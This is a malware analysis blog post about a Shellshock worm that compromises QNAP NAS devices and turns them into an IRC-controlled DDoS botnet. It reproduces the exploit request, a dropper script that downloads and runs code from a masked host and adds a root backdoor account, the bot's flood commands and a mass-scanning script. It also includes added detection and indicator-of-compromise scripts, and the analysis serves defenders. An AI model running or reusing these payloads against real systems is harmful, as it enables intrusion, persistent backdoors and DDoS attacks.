Armed Qnap-NAS Botnet Revealed

In addition to these analyses:

Worm Backdoors and Secures QNAP Network Storage Devices

Shellshock Worm Exploiting Unpatched QNAP NAS Devices

A little ShellShock fun

This is what we found.

As always, our publication is short but straight to the point.

The attackers send a GET request carrying a Shellshock exploit to IP ranges all over the Internet. Successfully compromised NAS devices are forced to download a payload from the Internet; this payload contains a shell script with cleverly designed logic built specifically for QNAP NAS devices. The payload downloads an ELF Linux installer package with bot functionality for DDoS. From this point the attacker builds persistence with a script inside the compromised NAS device.

Another interesting finding is that the attacker patches the vulnerable device against the Shellshock vulnerability; by doing this, the attacker prevents other hackers from taking over the already hacked NAS device.

Adding a “request” user with root privileges to the “passwd” and “shadow” files is a classic approach to owning a Linux machine. The real aim of this massive hack is the script “armgH.cgi”, which the attacker downloads and installs on the compromised machine.

With this CGI backdoor in place, the NAS becomes an armed device ready for DDoS. The whole attack scheme is designed to run continuously in autopilot mode.

So far we have detected more than 500 compromised devices.

Massive Attack -> Deploying Payload -> Patching against Shellshock (persistence) -> Arming -> Deploy the scanner


Attack Exploit in the wild.

GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: () { :; }; /bin/rm -rf /tmp/ && /bin/mkdir -p /share/HDB_DATA/…/php && /usr/bin/wget -c http://xxx.14.xx.79/ /tmp && /bin/sh /tmp/ 0<&1 2>&1500

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=utf-8
Content-Length:2250
Date: Sat, 13 Dec 2014 22:09:42 GMT
Server: header”>HTTP Status 404 – /cgi-bin/authLogin.cgi
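The request above carries the bash function-definition marker "() {" in the Host header. As an added example (not part of the original analysis), this script flags any header in captured request text whose value starts with that marker; the function names and the sample requests are constructed for illustration.

```sh
#!/bin/sh
# Flag HTTP request headers whose value begins with a bash function
# definition "() {", the Shellshock marker seen in the capture above.

# Reads raw HTTP request text on stdin (requests separated by blank lines).
# Prints "<request-path> <header-name>" for every suspicious header.
find_shellshock_headers() {
    awk '
        /^(GET|POST|HEAD) / { path = $2; next }   # request line: remember path
        /^[ \t\r]*$/        { path = ""; next }   # blank line ends a request
        {
            i = index($0, ":")
            if (i == 0) next                      # not a header line
            name  = substr($0, 1, i - 1)
            value = substr($0, i + 1)
            sub(/^[ \t]+/, "", value)
            # "()" followed by optional blanks and "{" at the start of a value
            if (value ~ /^[(][)][ \t]*[{]/) print path, name
        }
    '
}

# Constructed sample: one probe shaped like the capture (harmless command)
# and one ordinary request that must not be flagged.
sample_requests() {
    cat <<'EOF'
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: () { :; }; /bin/echo constructed-sample
User-Agent: test

GET /index.html HTTP/1.1
Host: nas.example
User-Agent: Mozilla/5.0 (X11; Linux)

EOF
}

sample_requests | find_shellshock_headers
```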

Payload – Hosted on a compromised server!

#!/bin/sh
export PATH=/opt/sbin:/opt/bin:/usr/local/bin:/bin:/usr/bin:/usr/sbin:/mnt/ext/usr/bin:/mnt/ext/usr/local/bin
unset HISTFIE ; unset REMOTEHOST ; unset SHISTORY ; unset BASHISTORY
os=`uname -m`
-P /tmp/ ; cd /tmp/ ;chmod +x ; sh
#
#
fold=/share/MD0_DATA/optware/.xpl/
if [[ “$os” == ‘armv5tel’ ]]; then
wget -c -P /share/MD0_DATA/optware/.xpl/ http://$ip/armgH.cgi
chmod 4755 /home/httpd/cgi-bin/armgH.cgi
mv /home/httpd/cgi-bin/armgH.cgi /home/httpd/cgi-bin/exo.cgi
cp /home/httpd/cgi-bin/exo.cgi ${fold}.exo.cgi
sleep 1
Search=”request”
Files=”/etc/passwd”
if grep $Search $Files; then
echo “$Search userits just added!”
else
echo “request:x:0:0:request:/share/homes/admin:/bin/sh” >> /etc/passwd
echo ‘request:$1$$PpwZ.r22sL5YrJ1ZQr58x0:15166:0:99999:7::: >> /etc/shadow
#inst patch
wget -P /mnt/HDA_ROOT/update_pkg/
#inst scan
sfolder=”/share/HDB_DATA/…/”
url69=http://xx.xx.xx.79/run
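The payload leaves concrete traces on the device: a UID-0 "request" account, the setuid backdoor CGI and its copies, and the hidden ".xpl" folder. The following added example (not code from the original post) checks a filesystem for exactly those artifacts; the ROOT argument, the function names and the sample tree are this example's own assumptions.

```sh
#!/bin/sh
# Check a QNAP filesystem for the artifacts named in the payload above.
# ROOT may be "/" on a live device or the mount point of a disk image.

check_qnap_iocs() {
    root=${1%/}
    # Root-level "request" account appended to passwd and shadow.
    if [ -f "$root/etc/passwd" ] &&
       awk -F: '$1 == "request" && $3 == 0 { hit = 1 } END { exit !hit }' "$root/etc/passwd"
    then
        echo "UID-0 account 'request' in /etc/passwd"
    fi
    if [ -f "$root/etc/shadow" ] && grep -q '^request:' "$root/etc/shadow"; then
        echo "account 'request' in /etc/shadow"
    fi
    # Backdoor CGI: original name, renamed copy, hidden copy in the .xpl folder.
    for f in home/httpd/cgi-bin/armgH.cgi home/httpd/cgi-bin/exo.cgi \
             share/MD0_DATA/optware/.xpl/.exo.cgi; do
        if [ -u "$root/$f" ]; then
            echo "setuid backdoor CGI: /$f"
        elif [ -e "$root/$f" ]; then
            echo "backdoor CGI: /$f"
        fi
    done
    if [ -d "$root/share/MD0_DATA/optware/.xpl" ]; then
        echo "staging directory: /share/MD0_DATA/optware/.xpl"
    fi
    return 0
}

# Constructed test tree that mimics an infected device (empty files only).
make_sample_tree() {
    t=$(mktemp -d)
    mkdir -p "$t/etc" "$t/home/httpd/cgi-bin" "$t/share/MD0_DATA/optware/.xpl"
    printf 'admin:x:0:0:administrator:/share/homes/admin:/bin/sh\n' > "$t/etc/passwd"
    printf 'request:x:0:0:request:/share/homes/admin:/bin/sh\n' >> "$t/etc/passwd"
    printf 'request:CONSTRUCTED-HASH:15166:0:99999:7:::\n' > "$t/etc/shadow"
    : > "$t/home/httpd/cgi-bin/exo.cgi"
    chmod 4755 "$t/home/httpd/cgi-bin/exo.cgi"
    echo "$t"
}

tree=$(make_sample_tree)
check_qnap_iocs "$tree"
rm -rf "$tree"
```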


 Arming the NAS devices for DDOS attacks.

Hosted on the compromised server: “armgH.cgi”, an ELF Linux backdoor with an IRC client and DDoS capability.

Output from the reverse-engineering analysis:

PRIVMSG %s :* .exec – execute a system command
PRIVMSG %s :* .version – show the current version of bot
PRIVMSG %s :* .status – show the status of bot
PRIVMSG %s :* .help – show this help message
PRIVMSG %s :* *** Scan Commands
PRIVMSG %s :* .advscan – scan with user:pass (A.B) classes sets by you
PRIVMSG %s :* .advscan – scan with d-link config reset bug
PRIVMSG %s :* .advscan->recursive – scan local ip range with user:pass, (C.D) classes random
PRIVMSG %s :* .advscan->recursive – scan local ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random – scan random ip range with user:pass, (A.B) classes random
PRIVMSG %s :* .advscan->random – scan random ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random->b – scan local ip range with user:pass, A.(B) class random
PRIVMSG %s :* .advscan->random->b – scan local ip range with d-link config reset bug
PRIVMSG %s :* .stop – stop current operation (scan/dos)
PRIVMSG %s :* *** DDos Commands:
PRIVMSG %s :* NOTE: to 0 = random ports, to 0 = random spoofing,
PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs
PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86
PRIVMSG %s :* .spoof – set the source address ip spoof
PRIVMSG %s :* .synflood – tcp syn flooder
PRIVMSG %s :* .ngsynflood – tcp ngsyn flooder (new generation)
PRIVMSG %s :* .ackflood <host> <port> <secs> – tcp ack flooder
PRIVMSG %s :* .ngackflood – tcp ngack flooder (new generation)
PRIVMSG %s :* *** IRC Commands:
PRIVMSG %s :* .setchan – set new master channel
PRIVMSG %s :* .join – join bot in selected room
PRIVMSG %s :* .part – part bot from selected room
PRIVMSG %s :* .quit – kill the current process

Screenshot from a hacked NAS device: with the payload deployed, it can be controlled via the CGI web backdoor.



 Mass scanner for Shellshock

This script was taken from a compromised NAS device. The attacker uses the “pnscan” multi-threaded port scanner to search for and hack other vulnerable QNAP NAS devices.

#!/bin/sh
#
# xXx@code 3-12-2014
rand=`echo $((RANDOM%255+2))`
#url=””
url=”http://xxx.14.xx.xx/;
download=”/bin/rm-rf /tmp/ && /bin/mkdir-p /share/HDB_DATA/…/php && /usr/bin/wget-c $url-P /tmp && /bin/sh /tmp/ 0<&1 2>&1 nnn”
get=”GET /cgi-bin/authLogin.cgi HTTP/1.1nHost: () { :; }; $download nnn”
./pnscan -rQDoc   -w”$get “-t500 -n300 $rand.0.0.0: 8080 > /dev/null &

Senad Aruch

Multiple Certified ISMS Professional with 10-year background in: IT Security, IDS and IPS, SIEM, SOC, Network Forensics, Malware Analyses, ISMS and RISK, Ethical Hacking, Vulnerability Management, Anti Fraud and Cyber Security. Currently holding a Senior Lead position.


Davide Cioccia

MSc Computer Engineering Degree. Security Developer focused on Cyber Security Intelligence, Malware analysis, Anti-fraud systems. Microsoft certified. Currently holding a Security Consultant position.

